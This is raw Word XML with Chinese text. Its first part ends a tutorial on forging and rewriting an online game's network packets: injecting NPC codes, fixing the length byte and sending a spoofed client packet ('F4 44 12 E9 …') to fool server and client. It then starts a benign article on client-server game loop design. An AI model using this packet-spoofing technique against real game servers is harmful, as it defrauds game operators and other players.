        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　我们确定要打的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数量。这个数量不能很大，原因在于网金的封包长度用一个字节表示，那么一个包可以有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>255</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节，我们上面分析过，增加一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要增加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节，所以大家算算就知道，打</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比较合适。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　然后我们要把客户端原来的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码分析计算出来，因为增加的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码要加上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>100000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哦。再把我们增加的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码计算出来，并且组合成新的封包，注意代表包长度的字节要修改啊，然后转发到服务器，这一步在编写程序的时候要注意算法，不要造成较大延迟。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　上面我们欺骗服务器端完成了，欺骗客户端就简单了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　发送了上面的封包后，我们根据新增</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码构造封包马上发给客户端，格式就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"F4 44 12 E9 NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 02 00 00 03 00 00 00 00 00 00",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把每个新增的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都构造这样一个包，按顺序连在一起发送给客户端，客户端也就被我们骗过了，很简单吧。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　以后战斗中其他的事我们就不管了，尽情地开打吧。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>goodmo*rning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集整理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请勿删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络游戏通讯模型初探①</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>序言</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　网络游戏，作为游戏与网络有机结合的产物，把玩家带入了新的娱乐领域。网络游戏在中国开始发展至今也仅有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年的历史，跟已经拥有几十年开发历史的单机游戏相比，网络游戏还是非常年轻的。当然，它的形成也是根据历史变化而产生的可以说没有互联网的兴起，也就没有网络游戏的诞生。作为新兴产物，网络游戏的开发对广大开发者来说更加神秘，对于一个未知领域，开发者可能更需要了解的是网络游戏与普通单机游戏有何区别，网络游戏如何将玩家们连接起来，以及如何为玩家提供一个互动的娱乐环境。本文就将围绕这三个主题来给大家讲述一下网络游戏的网络互连实现方法。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　网络游戏与单机游戏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　说到网络游戏，不得不让人联想到单机游戏，实际上网络游戏的实质脱离不了单机游戏的制作思想，网络游戏和单机游戏的差别大家可以很直接的想到：不就是可以多人连线吗？没错，但如何实现这些功能，如何把网络连线合理的融合进单机游戏，就是我们下面要讨论的内容。在了解网络互连具体实现之前，我们先来了解一下单机与网络游戏它们各自的运行流程，只有了解这些，你才能深入网络游戏开发的核心。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>现在先让我们来看一下普通单机游戏的简化执行流程：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Initialize() // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化模块</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　初始化游戏数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Game() // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>游戏循环部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　绘制游戏场景、人物以及其它元素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　获取用户操作输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">switch( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户输入数据</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 xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>移动</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处理人物移动</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break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</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处理攻击逻辑</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break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　其它处理响应</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default:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>break;</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游戏的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等逻辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Exit() // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>游戏结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　释放游戏数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　离开游戏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</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我们来说明一下上面单机游戏的流程。首先，不管是游戏软件还是其他应用软件，初始化部分必不可少，这里需要对游戏的数据进行初始化，包括图像、声音以及一些必备的数据。接下来，我们的游戏对场景、人物以及其他元素进行循环绘制，把游戏世界展现给玩家，同时接收玩家的输入操作，并根据操作来做出响应，此外，游戏还需要对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及一些逻辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行处理。最后，游戏数据被释放，游戏结束。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　网络游戏与单机游戏有一个很显著的差别，就是网络游戏除了一个供操作游戏的用户界面平台（如单机游戏）外，还需要一个用于连接所有用户，并为所有用户提供数据服务的服务器，从某些角度来看，游戏服务器就像一个大型的数据库，提供数据以及数据逻辑交互的功能。让我们来看看一个简单的网络游戏模型执行流程：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　客户机：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Login()// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登入模块</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　初始化游戏数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　获取用户输入的用户和密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　与服务器创建网络连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　发送至服务器进行用户验证</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等待服务器确认消息</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获得服务器反馈的登入消息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">if( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成立</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　进入游戏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　提示用户登入错误并重新接受用户登入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Game()// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>游戏循环部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　绘制游戏场景、人物以及其它元素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　获取用户操作输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　将用户的操作发送至服务器</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等待服务器的消息</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接收服务器的反馈信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">switch( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器反馈的消息数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</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 xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地玩家移动的消息</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 xml:space="preserve">if( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许本地玩家移动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　客户机处理人物移动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　客户机保持原有状态</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break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
